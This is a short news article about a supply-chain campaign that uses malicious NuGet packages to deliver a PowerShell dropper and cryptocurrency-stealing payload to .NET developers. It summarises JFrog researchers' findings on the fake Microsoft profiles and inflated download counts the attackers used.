.NET developers are being targeted by malware designed to steal their cryptocurrency, according to new reports.
JFrog cybersecurity researchers recently detected an active campaign where malicious packages were uploaded to the NuGet repository for .NET developers to download and use.
When enabled, packages download and run a PowerShell dropper called init.ps1, which modifies the endpoint configuration to allow PowerShell scripts to run without restrictions.
Custom payloads
This feature alone was enough of a red flag to warrant removal of the package, the researchers suggest: "This behavior is extremely rare outside of malicious packages, especially given the 'Unlimited' execution policy, which should immediately trigger a signal of alarm".
Still, if allowed to run without interruption, the package will download and run a "fully customized executable payload" for the Windows environment, the researchers added. It's also rare behavior, the analysts said, because hackers typically only use open source tools to save time.
To bolster their legitimacy, the hackers did two things. First, they wrote their NuGet repository profiles to pose as (opens in a new tab) Microsoft software developers working on the NuGet .NET package manager.
Second, they inflated the download counts of the malicious packages to obscene levels, making the packages look legitimate and get downloaded hundreds of thousands of times. While that may still be the case, the researchers said, it's more likely that they used bots to artificially inflate the numbers to surprise developers.
"The first three packages were downloaded an incredible number of times; this could be an indicator that the attack was very successful and infected a large number of machines," JFrog security researchers said. "However, this is not a completely reliable indicator of the success of the attack, as the attackers could have automatically inflated the number of downloads (with bots) to make the packages more legitimate."
Via: BleepingComputer (Opens in a new tab)